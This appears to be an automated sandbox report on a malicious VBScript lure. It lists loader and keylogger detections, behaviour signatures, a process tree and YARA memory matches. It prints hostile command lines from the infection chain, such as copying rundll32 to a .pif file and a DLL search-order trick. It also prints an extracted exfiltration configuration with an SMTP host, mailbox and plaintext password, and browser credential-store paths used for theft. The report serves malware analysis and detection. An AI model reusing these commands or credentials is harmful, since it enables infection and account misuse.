Edit tour

Windows Analysis Report
Draft doc PI ITS15235.vbs

Overview

General Information

Sample name:	Draft doc PI ITS15235.vbs
Analysis ID:	1618356
MD5:	82fe72e4395ab69063ae37812e097fa5
SHA1:	96692be9dcd400a38be42fc651d755f41d923efc
SHA256:	8c4334177584d7aee981ada042ff60124cd81a2e51e7c1514f7e2dd22f9335b4
Tags:	vbsuser-lowmal3
Infos:

Detection

DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Benign windows process drops PE files

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

VBScript performs obfuscated calls to suspicious functions

Yara detected DBatLoader

Yara detected PureLog Stealer

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

Allocates many large memory junks

Allocates memory in foreign processes

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Drops PE files to the user root directory

Drops PE files with a suspicious file extension

Joe Sandbox ML detected suspicious sample

Sample uses process hollowing technique

Sample uses string decryption to hide its real strings

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Sigma detected: Execution from Suspicious Folder

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Suspicious Program Location with Network Connections

Sigma detected: WScript or CScript Dropper

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Drops PE files to the windows directory (C:\Windows)

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Potentially Suspicious Rundll32 Activity

Sigma detected: Suspicious Outbound SMTP Connections

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

wscript.exe (PID: 8 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Draft doc PI ITS15235.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

x.exe (PID: 5496 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: EBA92CF15278AF942976C5066229C1B0)

cmd.exe (PID: 3272 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\NaisrtpfF.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6120 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\\Naisrtpf10.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

extrac32.exe (PID: 2120 cmdline: extrac32 /C /Y C:\\Windows\\System32\\rundll32.exe C:\\Users\\Public\\ndpha.pif MD5: 9472AAB6390E4F1431BAA912FCFF9707)

ndpha.pif (PID: 4428 cmdline: C:\\Users\\Public\\ndpha.pif zipfldr.dll,RouteTheCall C:\Windows \SysWOW64\svchost.pif MD5: 889B99C52A60DD49227C5E485A016679)

fptrsiaN.pif (PID: 5316 cmdline: C:\Users\Public\Libraries\fptrsiaN.pif MD5: C116D3604CEAFE7057D77FF27552C215)

Naisrtpf.PIF (PID: 8 cmdline: "C:\Users\Public\Libraries\Naisrtpf.PIF" MD5: EBA92CF15278AF942976C5066229C1B0)

fptrsiaN.pif (PID: 1196 cmdline: C:\Users\Public\Libraries\fptrsiaN.pif MD5: C116D3604CEAFE7057D77FF27552C215)

Naisrtpf.PIF (PID: 4960 cmdline: "C:\Users\Public\Libraries\Naisrtpf.PIF" MD5: EBA92CF15278AF942976C5066229C1B0)

fptrsiaN.pif (PID: 2836 cmdline: C:\Users\Public\Libraries\fptrsiaN.pif MD5: C116D3604CEAFE7057D77FF27552C215)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DBatLoader	This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.	No Attribution	https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html https://blog.vincss.net/re016-malware-analysis-modiloader/ https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 https://isc.sans.edu/diary/Malspam+pushes+ModiLoader+DBatLoader+infection+for+Remcos+RAT/29896 https://kienmanowar.wordpress.com/2024/04/09/quicknote-phishing-email-distributes-warzone-rat-via-dbatloader/	https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "info@irco.com.sa", "Password": "info12A", "Host": "mail.irco.com.sa", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "info@irco.com.sa", "Password": "info12A", "Host": "mail.irco.com.sa", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000A.00000001.1837489352.0000000000400000.00000040.00000001.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 53 88 44 24 2B 88 44 24 2F B0 85 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0000000F.00000001.1912204476.0000000000ED0000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f95a:$a1: get_encryptedPassword 0x3f92e:$a2: get_encryptedUsername 0x3f9f2:$a3: get_timePasswordChanged 0x3f90a:$a4: get_passwordField 0x3f970:$a5: set_encryptedPassword 0x3f73d:$a7: get_logins 0x3adb8:$a10: KeyLoggerEventArgs 0x3ad87:$a11: KeyLoggerEventArgsEventHandler 0x3f811:$a13: _encryptedPassword
00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4aa88:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x4a12b:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a388:$a4: \Orbitum\User Data\Default\Login Data 0x4ad67:$a5: \Kometa\User Data\Default\Login Data
00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d50d:$s1: UnHook 0x3d4a9:$s2: SetHook 0x3d4e2:$s3: CallNextHook 0x3d471:$s4: _hook
00000006.00000002.2971941444.0000000000ED0000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
00000006.00000002.3000201227.000000001D40F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f95a:$a1: get_encryptedPassword 0x3f92e:$a2: get_encryptedUsername 0x3f9f2:$a3: get_timePasswordChanged 0x3f90a:$a4: get_passwordField 0x3f970:$a5: set_encryptedPassword 0x3f73d:$a7: get_logins 0x3adb8:$a10: KeyLoggerEventArgs 0x3ad87:$a11: KeyLoggerEventArgsEventHandler 0x3f811:$a13: _encryptedPassword
0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4aa88:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x4a12b:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a388:$a4: \Orbitum\User Data\Default\Login Data 0x4ad67:$a5: \Kometa\User Data\Default\Login Data
0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d50d:$s1: UnHook 0x3d4a9:$s2: SetHook 0x3d4e2:$s3: CallNextHook 0x3d471:$s4: _hook
0000000A.00000002.3001487610.0000000021E45000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.3001487610.0000000021E45000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000A.00000002.3001487610.0000000021D91000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000006.00000003.1724265899.000000001B2EC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000003.1724265899.000000001B2EC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000006.00000003.1724265899.000000001B2EC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000006.00000003.1724265899.000000001B2EC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000006.00000003.1724265899.000000001B2EC000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f24a:$a1: get_encryptedPassword 0x3f21e:$a2: get_encryptedUsername 0x3f2e2:$a3: get_timePasswordChanged 0x3f1fa:$a4: get_passwordField 0x3f260:$a5: set_encryptedPassword 0x3f02d:$a7: get_logins 0x3a6a8:$a10: KeyLoggerEventArgs 0x3a677:$a11: KeyLoggerEventArgsEventHandler 0x3f101:$a13: _encryptedPassword
0000000A.00000002.3000473987.0000000021B19000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.3000473987.0000000021B19000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000A.00000002.3000473987.0000000021B19000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000A.00000002.3000473987.0000000021B19000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000A.00000002.3000473987.0000000021B19000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x806a0:$a1: get_encryptedPassword 0x80674:$a2: get_encryptedUsername 0x80738:$a3: get_timePasswordChanged 0x80650:$a4: get_passwordField 0x806b6:$a5: set_encryptedPassword 0x80483:$a7: get_logins 0x7bafe:$a10: KeyLoggerEventArgs 0x7bacd:$a11: KeyLoggerEventArgsEventHandler 0x80557:$a13: _encryptedPassword
0000000F.00000002.3001337682.00000000311F8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000002.3001337682.00000000311F8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000A.00000002.3001487610.0000000021EEC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000F.00000003.1916140937.000000002F0FD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000003.1916140937.000000002F0FD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000F.00000003.1916140937.000000002F0FD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000F.00000003.1916140937.000000002F0FD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000F.00000003.1916140937.000000002F0FD000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f3a2:$a1: get_encryptedPassword 0x3f376:$a2: get_encryptedUsername 0x3f43a:$a3: get_timePasswordChanged 0x3f352:$a4: get_passwordField 0x3f3b8:$a5: set_encryptedPassword 0x3f185:$a7: get_logins 0x3a800:$a10: KeyLoggerEventArgs 0x3a7cf:$a11: KeyLoggerEventArgsEventHandler 0x3f259:$a13: _encryptedPassword
0000000F.00000002.2971881656.0000000000ED0000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
0000000F.00000002.3012935219.0000000033BF0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000002.3012935219.0000000033BF0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000F.00000002.3012935219.0000000033BF0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000F.00000002.3012935219.0000000033BF0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000F.00000002.3012935219.0000000033BF0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ea52:$a1: get_encryptedPassword 0x3ea26:$a2: get_encryptedUsername 0x3eaea:$a3: get_timePasswordChanged 0x3ea02:$a4: get_passwordField 0x3ea68:$a5: set_encryptedPassword 0x3e835:$a7: get_logins 0x39eb0:$a10: KeyLoggerEventArgs 0x39e7f:$a11: KeyLoggerEventArgsEventHandler 0x3e909:$a13: _encryptedPassword
0000000F.00000002.3012935219.0000000033BF0000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49b80:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49223:$a3: \Google\Chrome\User Data\Default\Login Data 0x49480:$a4: \Orbitum\User Data\Default\Login Data 0x49e5f:$a5: \Kometa\User Data\Default\Login Data
0000000F.00000002.3012935219.0000000033BF0000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c605:$s1: UnHook 0x3c5a1:$s2: SetHook 0x3c5da:$s3: CallNextHook 0x3c569:$s4: _hook
0000000A.00000003.1840988876.000000001FFCD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000003.1840988876.000000001FFCD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000A.00000003.1840988876.000000001FFCD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000A.00000003.1840988876.000000001FFCD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000A.00000003.1840988876.000000001FFCD000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f47a:$a1: get_encryptedPassword 0x3f44e:$a2: get_encryptedUsername 0x3f512:$a3: get_timePasswordChanged 0x3f42a:$a4: get_passwordField 0x3f490:$a5: set_encryptedPassword 0x3f25d:$a7: get_logins 0x3a8d8:$a10: KeyLoggerEventArgs 0x3a8a7:$a11: KeyLoggerEventArgsEventHandler 0x3f331:$a13: _encryptedPassword
00000006.00000002.2971941444.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 53 88 44 24 2B 88 44 24 2F B0 85 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0000000F.00000001.1912204476.0000000000400000.00000040.00000001.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 53 88 44 24 2B 88 44 24 2F B0 85 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0000000F.00000002.2971881656.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 53 88 44 24 2B 88 44 24 2F B0 85 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000006.00000001.1720780507.0000000000400000.00000040.00000001.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 53 88 44 24 2B 88 44 24 2F B0 85 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0000000A.00000001.1837489352.0000000000ED0000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
00000001.00000002.1759642161.000000007FAE0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
0000000A.00000002.3012481988.0000000024330000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.3012481988.0000000024330000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000A.00000002.3012481988.0000000024330000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000A.00000002.3012481988.0000000024330000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000A.00000002.3012481988.0000000024330000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ea52:$a1: get_encryptedPassword 0x3ea26:$a2: get_encryptedUsername 0x3eaea:$a3: get_timePasswordChanged 0x3ea02:$a4: get_passwordField 0x3ea68:$a5: set_encryptedPassword 0x3e835:$a7: get_logins 0x39eb0:$a10: KeyLoggerEventArgs 0x39e7f:$a11: KeyLoggerEventArgsEventHandler 0x3e909:$a13: _encryptedPassword
0000000A.00000002.3012481988.0000000024330000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49b80:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49223:$a3: \Google\Chrome\User Data\Default\Login Data 0x49480:$a4: \Orbitum\User Data\Default\Login Data 0x49e5f:$a5: \Kometa\User Data\Default\Login Data
0000000A.00000002.3012481988.0000000024330000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c605:$s1: UnHook 0x3c5a1:$s2: SetHook 0x3c5da:$s3: CallNextHook 0x3c569:$s4: _hook
0000000F.00000002.3001337682.00000000310F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f95a:$a1: get_encryptedPassword 0x3f92e:$a2: get_encryptedUsername 0x3f9f2:$a3: get_timePasswordChanged 0x3f90a:$a4: get_passwordField 0x3f970:$a5: set_encryptedPassword 0x3f73d:$a7: get_logins 0x3adb8:$a10: KeyLoggerEventArgs 0x3ad87:$a11: KeyLoggerEventArgsEventHandler 0x3f811:$a13: _encryptedPassword
0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4aa88:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x4a12b:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a388:$a4: \Orbitum\User Data\Default\Login Data 0x4ad67:$a5: \Kometa\User Data\Default\Login Data
0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d50d:$s1: UnHook 0x3d4a9:$s2: SetHook 0x3d4e2:$s3: CallNextHook 0x3d471:$s4: _hook
0000000A.00000002.2971876015.0000000000ED0000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
